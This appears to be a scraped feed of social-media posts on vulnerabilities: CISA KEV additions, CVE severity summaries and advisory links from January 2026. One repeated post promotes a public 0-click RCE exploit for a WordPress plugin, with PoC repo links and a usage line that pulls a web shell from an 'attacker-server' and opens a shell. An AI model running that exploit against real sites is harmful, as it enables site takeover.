##CVE ID: CVE-2018-14634
Vendor: Linux
Product: Kernal
Date Added: 2026-01-26
Notes: This vulnerability affects a common open-source component, third-party library, or a protocol used by different products. Please check with specific vendors for information on patching status. For more information, please see: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/about/ ; https://www.kernel.org/ ; https://www.cve.org/CVERecord?id=CVE-2018-14634; https://access.redhat.com/errata/RHSA-2018:3540 ; https://nvd.nist.gov/vuln/detail/CVE-2018-14634
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2018-14634
CISA has updated the KEV catalogue.
CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-24061
CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-23760
CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability https://www.cve.org/CVERecord?id=CVE-2025-52691
CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability https://www.cve.org/CVERecord?id=CVE-2018-14634 #CISA #Linux #infosec #vulnerability #GNU
##updated 2026-01-26T21:15:56.233000
2 posts
1 repos
EUVD has listed critical CVE-2026-21962 Oracle HTTP Server vulnerability https://euvd.enisa.europa.eu/vulnerability/EUVD-2026-3550
Oracle Critical Patch Update Advisory - January 2026 https://www.oracle.com/security-alerts/cpujan2026.html #infosec #vulnerability #Oracle
##EUVD has listed critical CVE-2026-21962 Oracle HTTP Server vulnerability https://euvd.enisa.europa.eu/vulnerability/EUVD-2026-3550
Oracle Critical Patch Update Advisory - January 2026 https://www.oracle.com/security-alerts/cpujan2026.html #infosec #vulnerability #Oracle
##updated 2026-01-26T19:16:23.930000
2 posts
π΄ CVE-2026-22586 - Critical (9.8)
Hard-coded Cryptographic Key vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Manipulation. This issue...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22586/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-22586 - Critical (9.8)
Hard-coded Cryptographic Key vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Manipulation. This issue...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22586/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T18:57:15
5 posts
CVE-2026-22709 Exposes Critical vm2 Sandbox Escape Risk in Nodejs Environments
Introduction: A Familiar Sandbox, A Repeating Security Pattern The vm2 library has long been positioned as a safety layer for running untrusted JavaScript inside Node.js applications. For years, it served as a quiet backbone for SaaS platforms, online code runners, chatbots, and developer tools that needed isolation without sacrificing flexibility. However, history has shown that vm2βsβ¦
##Critical sandbox escape flaw discovered in popular vm2 NodeJS library
A critical-severity vulnerability in the vm2 Node.js sandbox library, tracked as CVE-2026-22709, allows escaping the sandbox and executing...
ποΈ [Bleepingcomputer] https://link.is.it/hbFnIL
##Critical sandbox escape flaw discovered in popular vm2 NodeJS library
A critical-severity vulnerability in the vm2 Node.js sandbox library, tracked as CVE-2026-22709, allows escaping the sandbox and executing...
ποΈ [Bleepingcomputer] https://link.is.it/hbFnIL
##π΄ CVE-2026-22709 - Critical (9.8)
vm2 is an open source vm/sandbox for Node.js. In vm2 prior to version 3.10.2, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code. In lib/setu...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22709/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##GitHub just updated these:
CVE-2026-22709, critical: vm2 has a Sandbox Escape https://github.com/advisories/GHSA-99p7-6v5w-7xg8
CVE-2026-22696, critical: dcap-qvl has Missing Verification for QE Identity https://github.com/advisories/GHSA-796p-j2gh-9m2q #infosec #vulnerability
##updated 2026-01-26T18:55:14
1 posts
1 repos
GitHub just updated these:
CVE-2026-22709, critical: vm2 has a Sandbox Escape https://github.com/advisories/GHSA-99p7-6v5w-7xg8
CVE-2026-22696, critical: dcap-qvl has Missing Verification for QE Identity https://github.com/advisories/GHSA-796p-j2gh-9m2q #infosec #vulnerability
##updated 2026-01-26T18:32:34
1 posts
π΄ CVE-2026-22583 - Critical (9.8)
Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement (CloudPagesUrl module) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engageme...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22583/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T18:32:32
1 posts
π΄ CVE-2025-52024 - Critical (9.4)
A vulnerability exists in the Aptsys POS Platform Web Services module thru 2025-05-28, which exposes internal API testing tools to unauthenticated users. By accessing specific URLs, an attacker is presented with a directory-style index listing all...
π https://www.thehackerwire.com/vulnerability/CVE-2025-52024/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T18:32:32
1 posts
π΄ CVE-2025-13952 - Critical (9.8)
A web page that contains unusual GPU shader code is loaded from the Internet into the GPU compiler process triggers a write use-after-free crash in the GPU shader compiler library. On certain platforms, when the compiler process has system privile...
π https://www.thehackerwire.com/vulnerability/CVE-2025-13952/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T18:31:31
1 posts
π΄ CVE-2025-70982 - Critical (9.9)
Incorrect access control in the importUser function of SpringBlade v4.5.0 allows attackers with low-level privileges to arbitrarily import sensitive user data.
π https://www.thehackerwire.com/vulnerability/CVE-2025-70982/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T18:31:31
1 posts
π CVE-2025-67274 - High (7.5)
An issue in continuous.software aangine v.2025.2 allows a remote attacker to obtain sensitive information via the excel-integration-service template download module, integration-persistence-service job listing module, portfolio-item-service data r...
π https://www.thehackerwire.com/vulnerability/CVE-2025-67274/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T17:16:11.030000
1 posts
π CVE-2025-52026 - High (7.5)
An information disclosure vulnerability exists in the /srvs/membersrv/getCashiers endpoint of the Aptsys gemscms backend platform thru 2025-05-28. This unauthenticated endpoint returns a list of cashier accounts, including names, email addresses, ...
π https://www.thehackerwire.com/vulnerability/CVE-2025-52026/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T17:16:10.867000
1 posts
π΄ CVE-2025-52025 - Critical (9.4)
An SQL Injection vulnerability exists in the GetServiceByRestaurantID endpoint of the Aptsys gemscms POS Platform backend thru 2025-05-28. The vulnerability arises because user input is directly inserted into a dynamic SQL query syntax without pro...
π https://www.thehackerwire.com/vulnerability/CVE-2025-52025/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T16:15:59.017000
1 posts
π CVE-2025-67264 - High (7.8)
An OS command injection vulnerability in the com.sprd.engineermode component in Doogee Note59, Note59 Pro, and Note59 Pro+ allows a local attacker to execute arbitrary code and escalate privileges via the EngineerMode ADB shell, due to incomplete ...
π https://www.thehackerwire.com/vulnerability/CVE-2025-67264/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:31:29
1 posts
π CVE-2026-1283 - High (7.8)
A Heap-based Buffer Overflow vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS 2025 through Release SOLIDWORKS 2026 could allow an attacker to execute arbitrary code while opening a specially c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-1283/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:04:33.567000
1 posts
Critical File Upload Flaw reported RealHomes CRM Plugin
RealHomes CRM plugin version 1.0.1 patches a critical file upload vulnerability (CVE-2025-67968) that allowed low-privileged users to take over WordPress sites. The flaw affected over 30,000 real estate websites by failing to validate user permissions and file types.
**If you are using RealHomes CRM plugin, update it ASAP to version 1.0.1. Attackers can easily upload web shell and take over your website. When coding, always use proper permission checks and file type validation for file uploads.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-file-upload-flaw-reported-realhomes-crm-plugin-h-i-l-g-i/gD2P6Ple2L
updated 2026-01-26T15:04:14.850000
1 posts
π CVE-2026-24367 - High (8.8)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in shinetheme Traveler traveler allows Blind SQL Injection.This issue affects Traveler: from n/a through < 3.2.8.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24367/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:04:14.850000
1 posts
π CVE-2025-66428 - High (8.8)
An issue with WordPress directory names in WebPros WordPress Toolkit before 6.9.1 allows privilege escalation.
π https://www.thehackerwire.com/vulnerability/CVE-2025-66428/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:04:14.850000
1 posts
π CVE-2026-20736 - High (7.5)
Gitea does not properly verify repository context when deleting attachments. A user who previously uploaded an attachment to a repository may be able to delete it after losing access to that repository by making the request through a different rep...
π https://www.thehackerwire.com/vulnerability/CVE-2026-20736/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:04:14.850000
1 posts
π΄ CVE-2026-20897 - Critical (9.1)
Gitea does not properly validate repository ownership when deleting Git LFS locks. A user with write access to one repository may be able to delete LFS locks belonging to other repositories.
π https://www.thehackerwire.com/vulnerability/CVE-2026-20897/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:04:14.850000
1 posts
If you missed this, Microsoft posted several security updates yesterday, all of them critical, affecting Microsoft accounts, Copilot, Office, Azure, and Entra: https://msrc.microsoft.com/update-guide
Noteworthy:
- Microsoft Account Spoofing Vulnerability: CVE-2026-21264 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21264
- Azure Entra ID Elevation of Privilege Vulnerability: CVE-2026-24305 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24305
- Azure Front Door Elevation of Privilege Vulnerability: CVE-2026-24306 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24306 #infosec #Microsoft #Azure #Copilot #vulnerability
##updated 2026-01-26T15:03:51.687000
1 posts
π CVE-2026-24609 - High (7.5)
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Laurent laurent allows PHP Local File Inclusion.This issue affects Laurent: from n/a through <= 3.1.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24609/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:03:51.687000
1 posts
π CVE-2025-69908 - High (7.5)
An unauthenticated information disclosure vulnerability in Newgen OmniApp allows attackers to enumerate valid privileged usernames via a publicly accessible client-side JavaScript resource.
π https://www.thehackerwire.com/vulnerability/CVE-2025-69908/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:03:51.687000
1 posts
π CVE-2026-0710 - High (8.4)
A flaw was found in SIPp. A remote attacker could exploit this by sending specially crafted Session Initiation Protocol (SIP) messages during an active call. This vulnerability, a NULL pointer dereference, can cause the application to crash, leadi...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0710/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:03:51.687000
1 posts
π CVE-2025-14866 - High (8.8)
The Melapress Role Editor plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.1.1. This is due to a misconfigured capability check on the 'save_secondary_roles_field' function. This makes it possible ...
π https://www.thehackerwire.com/vulnerability/CVE-2025-14866/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:03:51.687000
1 posts
π΄ CVE-2025-4320 - Critical (10)
Authentication Bypass by Primary Weakness, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Authentication Bypass, Password Recovery Exploitation.This issue affe...
π https://www.thehackerwire.com/vulnerability/CVE-2025-4320/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:03:51.687000
1 posts
π΄ CVE-2025-15063 - Critical (9.8)
Ollama MCP Server execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ollama MCP Server. Authentication is not required to exploit this ...
π https://www.thehackerwire.com/vulnerability/CVE-2025-15063/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:03:51.687000
1 posts
π CVE-2025-15062 - High (7.8)
Trimble SketchUp SKP File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Trimble SketchUp. User interaction is required to exploit this ...
π https://www.thehackerwire.com/vulnerability/CVE-2025-15062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:03:51.687000
1 posts
π CVE-2026-0762 - High (8.1)
GPT Academic stream_daas Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GPT Academic. Interaction with a malicious DAAS serve...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0762/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:03:33.357000
1 posts
π CVE-2026-1284 - High (7.8)
An Out-Of-Bounds Write vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS 2025 through Release SOLIDWORKS 2026 could allow an attacker to execute arbitrary code while opening a specially crafted...
π https://www.thehackerwire.com/vulnerability/CVE-2026-1284/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:03:33.357000
1 posts
1 repos
π΄ CVE-2025-13374 - Critical (9.8)
The Kalrav AI Agent plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the kalrav_upload_file AJAX action in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated atta...
π https://www.thehackerwire.com/vulnerability/CVE-2025-13374/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:03:33.357000
1 posts
π CVE-2026-1257 - High (7.5)
The Administrative Shortcodes plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.3.4 via the 'slug' attribute of the 'get_template' shortcode. This is due to insufficient path validation on user-supp...
π https://www.thehackerwire.com/vulnerability/CVE-2026-1257/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:03:33.357000
1 posts
π CVE-2026-24412 - High (8.8)
iccDEV provides libraries and tools for interacting with, manipulating, and applying ICC color management profiles. Versions 2.3.1.1 and below have aHeap Buffer Overflow vulnerability in the CIccTagXmlSegmentedCurve::ToXml() function. This occurs ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24412/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T15:03:33.357000
1 posts
updated 2026-01-26T15:03:33.357000
1 posts
π CVE-2025-70986 - High (7.5)
Incorrect access control in the selectDept function of RuoYi v4.8.2 allows unauthorized attackers to arbitrarily access sensitive department data.
π https://www.thehackerwire.com/vulnerability/CVE-2025-70986/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T09:30:24
1 posts
π CVE-2026-1428 - High (8.8)
Single Sign-On Portal System developed by WellChoose has a OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server.
π https://www.thehackerwire.com/vulnerability/CVE-2026-1428/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T09:30:24
1 posts
π CVE-2026-1427 - High (8.8)
Organization Portal System developed by WellChoose has a OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server.
π https://www.thehackerwire.com/vulnerability/CVE-2026-1427/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T06:30:34
1 posts
π CVE-2026-1420 - High (8.8)
A flaw has been found in Tenda AC23 16.03.07.52. This impacts an unknown function of the file /goform/WifiExtraSet. This manipulation of the argument wpapsk_crypto causes buffer overflow. Remote exploitation of the attack is possible. The exploit ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-1420/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-24T15:30:21
1 posts
π CVE-2026-0911 - High (7.5)
The Hustle β Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to arbitrary file uploads due to incorrect file type validation in the action_import_module() function in all versions up to, and including, 7.8.9.2...
π https://www.thehackerwire.com/vulnerability/CVE-2026-0911/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T22:36:54
1 posts
π CVE-2025-69180 - High (8.8)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in themepassion Ultra Portfolio ultra-portfolio allows Blind SQL Injection.This issue affects Ultra Portfolio: from n/a through <= 6.7.
π https://www.thehackerwire.com/vulnerability/CVE-2025-69180/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T22:36:54
1 posts
π CVE-2026-24608 - High (7.5)
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Elated-Themes Laurent Core laurent-core allows PHP Local File Inclusion.This issue affects Laurent Core: from n/a through <...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24608/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T22:36:54
1 posts
π CVE-2026-24635 - High (7.5)
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in DevsBlink EduBlink Core edublink-core allows PHP Local File Inclusion.This issue affects EduBlink Core: from n/a through <=...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24635/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T22:35:52
1 posts
π CVE-2025-69907 - High (7.5)
An unauthenticated information disclosure vulnerability exists in Newgen OmniDocs due to missing authentication and access control on the /omnidocs/GetListofCabinet API endpoint. A remote attacker can access this endpoint without valid credentials...
π https://www.thehackerwire.com/vulnerability/CVE-2025-69907/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T22:35:51
1 posts
1 repos
Critical Remote Code Execution Vulnerability Reported in Python PLY Library
A critical remote code execution vulnerability (CVE-2025-56005) was reported in the Python PLY library version 3.11 due to an undocumented and unsafe use of the pickle module. Attackers can exploit this flaw to run arbitrary code during parser initialization by providing a malicious pickle file.
**If you use Python PLY library, search and remove any use of the picklefile parameter - it's vulnerable with no fix available. Regenerate parser tables at startup instead and lock down write access to prevent attackers from planting malicious files.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-remote-code-execution-vulnerability-reported-in-python-ply-library-r-2-p-b-b/gD2P6Ple2L
updated 2026-01-23T21:31:51
1 posts
π CVE-2025-66720 - High (7.5)
Null pointer dereference in free5gc pcf 1.4.0 in file internal/sbi/processor/ampolicy.go in function HandleDeletePoliciesPolAssoId.
π https://www.thehackerwire.com/vulnerability/CVE-2025-66720/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T21:31:51
1 posts
π΄ CVE-2025-67229 - Critical (9.8)
An improper certificate validation vulnerability exists in ToDesktop Builder v0.32.1 This vulnerability allows an unauthenticated, on-path attacker to spoof backend responses by exploiting insufficient certificate validation.
π https://www.thehackerwire.com/vulnerability/CVE-2025-67229/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T21:31:50
1 posts
π΄ CVE-2025-66719 - Critical (9.1)
An issue was discovered in Free5gc NRF 1.4.0. In the access-token generation logic of free5GC, the AccessTokenScopeCheck() function in file internal/sbi/processor/access_token.go bypasses all scope validation when the attacker uses a crafted targe...
π https://www.thehackerwire.com/vulnerability/CVE-2025-66719/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T21:31:35
7 posts
Tracked as CVE-2024-37079 (CVSS score of 9.8), the flaw is described as an out-of-bounds write issue in the Distributed Computing Environment/Remote Procedure Calls (DCERPC) protocol implementation of vCenter Server. https://www.securityweek.com/2024-vmware-flaw-now-in-attackers-crosshairs/
##VMware vCenter : la CVE-2024-37079 est activement exploitΓ©e dβaprΓ¨s la CISA https://www.it-connect.fr/vmware-vcenter-la-cve-2024-37079-est-activement-exploitee-dapres-la-cisa/ #ActuCybersΓ©curitΓ© #CybersΓ©curitΓ© #VulnΓ©rabilitΓ© #VMware
##As it is public now* I'm able to talk about it.
Check your VMware infrastructure. CVE-2024-37079 is known to have been exploited in the wild.
> UPDATE: Broadcom has information to suggest that exploitation of CVE-2024-37079 has occurred in the wild.
https://euvd.enisa.europa.eu/vulnerability/CVE-2024-37079
https://euvd.enisa.europa.eu/vulnerability/CVE-2024-37080
https://euvd.enisa.europa.eu/vulnerability/CVE-2024-37081
* technically since Friday.
##The vulnerability in question is CVE-2024-37079 (CVSS score: 9.8), which refers to a heap overflow in the implementation of the DCE/RPC protocol that could allow a bad actor with network access to vCenter Server to achieve remote code execution. https://thehackernews.com/2026/01/cisa-adds-actively-exploited-vmware.html
##Here's a summary of the latest in technology and cybersecurity from the last 24 hours:
**Cybersecurity:** Marlink Cyber revealed a critical DNS DoS flaw in ISC BIND (Jan 22). CISA added a Broadcom VMware vCenter vulnerability (CVE-2024-37079) to its exploited list (Jan 23). CISA & NSA warned of Chinese state-sponsored BRICKSTORM malware targeting gov networks (Jan 22).
**Technology:** Apple's Siri AI training is reportedly shifting to Google's TPUs (Jan 22). Nvidia CEO Jensen Huang linked AI growth to power constraints at Davos (Jan 22).
##βΌοΈCISA has added 5 vulnerabilities to the KEV Catalog
https://darkwebinformer.com/cisa-kev-catalog/
CVE-2024-37079: Broadcom VMware vCenter Server Out-of-bounds Write Vulnerability
CVE-2025-68645: Synacor Zimbra Collaboration Suite (ZCS) PHP Remote File Inclusion Vulnerability
CVE-2025-34026: Versa Concerto Improper Authentication Vulnerability
CVE-2025-31125: Vite Vitejs Improper Access Control Vulnerability
CVE-2025-54313: Prettier eslint-config-prettier Embedded Malicious Code Vulnerability
##CVE ID: CVE-2024-37079
Vendor: Broadcom
Product: VMware vCenter Server
Date Added: 2026-01-23
Notes: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453 ; https://nvd.nist.gov/vuln/detail/CVE-2024-37079
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-37079
updated 2026-01-23T21:30:54
1 posts
π΄ CVE-2025-70983 - Critical (9.9)
Incorrect access control in the authRoutes function of SpringBlade v4.5.0 allows attackers with low-level privileges to escalate privileges.
π https://www.thehackerwire.com/vulnerability/CVE-2025-70983/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T21:30:44
1 posts
π΄ CVE-2025-70985 - Critical (9.1)
Incorrect access control in the update function of RuoYi v4.8.2 allows unauthorized attackers to arbitrarily modify data outside of their scope.
π https://www.thehackerwire.com/vulnerability/CVE-2025-70985/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T21:30:43
1 posts
π΄ CVE-2025-56590 - Critical (9.8)
An issue was discovered in the InsertFromURL() function of the Apryse HTML2PDF SDK thru 11.10. This vulnerability could allow an attacker to execute arbitrary operating system commands on the local server.
π https://www.thehackerwire.com/vulnerability/CVE-2025-56590/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T21:30:43
1 posts
π CVE-2026-24572 - High (8.8)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nelio Software Nelio Content nelio-content allows Blind SQL Injection.This issue affects Nelio Content: from n/a through <= 4.1.0.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24572/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T21:30:35
1 posts
βΌοΈCISA has added 5 vulnerabilities to the KEV Catalog
https://darkwebinformer.com/cisa-kev-catalog/
CVE-2024-37079: Broadcom VMware vCenter Server Out-of-bounds Write Vulnerability
CVE-2025-68645: Synacor Zimbra Collaboration Suite (ZCS) PHP Remote File Inclusion Vulnerability
CVE-2025-34026: Versa Concerto Improper Authentication Vulnerability
CVE-2025-31125: Vite Vitejs Improper Access Control Vulnerability
CVE-2025-54313: Prettier eslint-config-prettier Embedded Malicious Code Vulnerability
##updated 2026-01-23T20:14:54
1 posts
π΄ CVE-2026-20912 - Critical (9.1)
Gitea does not properly validate repository ownership when linking attachments to releases. An attachment uploaded to a private repository could potentially be linked to a release in a different public repository, making it accessible to unauthori...
π https://www.thehackerwire.com/vulnerability/CVE-2026-20912/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T20:14:36
1 posts
π΄ CVE-2026-20750 - Critical (9.1)
Gitea does not properly validate project ownership in organization project operations. A user with project write access in one organization may be able to modify projects belonging to a different organization.
π https://www.thehackerwire.com/vulnerability/CVE-2026-20750/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T19:15:51.993000
1 posts
ILIAS 10.0, 10.1, 10.2 β Unauthenticated RCE write-up published:
https://srlabs.de/blog/breaking-ilias-part-2-three-to-rce
Why is this being published only now?
The vulnerability discussed here is tracked as CVE-2025-11344 and was assigned a CVSS base score of 5.3 (MEDIUM). Anyone wondering why this was not classified as CRITICAL should be aware that the CNA relied on the base score and severity assessment provided by ILIAS in its security advisory, which included neither a scoring matrix nor any justification for the rating.
##updated 2026-01-23T18:39:33.290000
1 posts
3 repos
https://github.com/Ashwesker/Ashwesker-CVE-2025-68645
βΌοΈCISA has added 5 vulnerabilities to the KEV Catalog
https://darkwebinformer.com/cisa-kev-catalog/
CVE-2024-37079: Broadcom VMware vCenter Server Out-of-bounds Write Vulnerability
CVE-2025-68645: Synacor Zimbra Collaboration Suite (ZCS) PHP Remote File Inclusion Vulnerability
CVE-2025-34026: Versa Concerto Improper Authentication Vulnerability
CVE-2025-31125: Vite Vitejs Improper Access Control Vulnerability
CVE-2025-54313: Prettier eslint-config-prettier Embedded Malicious Code Vulnerability
##updated 2026-01-23T18:31:37
2 posts
SmarterTools aren't so smart after all.
VulnCheck, from yesterday: Street Smarts: SmarterMail ConnectToHub Unauthenticated RCE (CVE-2026-24423) https://www.vulncheck.com/blog/smartermail-connecttohub-rce-cve-2026-24423 @vulncheck #infosec #threatresearch #vulnerability
##SmarterTools aren't so smart after all.
VulnCheck, from yesterday: Street Smarts: SmarterMail ConnectToHub Unauthenticated RCE (CVE-2026-24423) https://www.vulncheck.com/blog/smartermail-connecttohub-rce-cve-2026-24423 @vulncheck #infosec #threatresearch #vulnerability
##updated 2026-01-23T18:31:22
2 posts
3 repos
https://github.com/RandomRobbieBF/CVE-2024-9932
https://github.com/Nxploited/CVE-2024-9932-POC
https://github.com/JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-9932
βΌοΈ CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE).
GitHub: https://github.com/JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-9932
Type: 0-Click RCE Exploit
Usage: python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php
After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.
##βΌοΈ CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE).
GitHub: https://github.com/JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-9932
Type: 0-Click RCE Exploit
Usage: python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php
After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.
##updated 2026-01-23T15:31:44
1 posts
π΄ CVE-2025-4319 - Critical (9.4)
Improper Restriction of Excessive Authentication Attempts, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Brute Force, Password Recovery Exploitation.This issu...
π https://www.thehackerwire.com/vulnerability/CVE-2025-4319/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T06:31:32
1 posts
π CVE-2025-15351 - High (7.8)
Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu VectorStar. User interaction is re...
π https://www.thehackerwire.com/vulnerability/CVE-2025-15351/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T06:31:32
1 posts
π CVE-2025-15349 - High (7.5)
Anritsu ShockLine SCPI Race Condition Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Anritsu ShockLine. Authentication is not required to exploit thi...
π https://www.thehackerwire.com/vulnerability/CVE-2025-15349/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-23T06:31:26
1 posts
π CVE-2025-15059 - High (7.8)
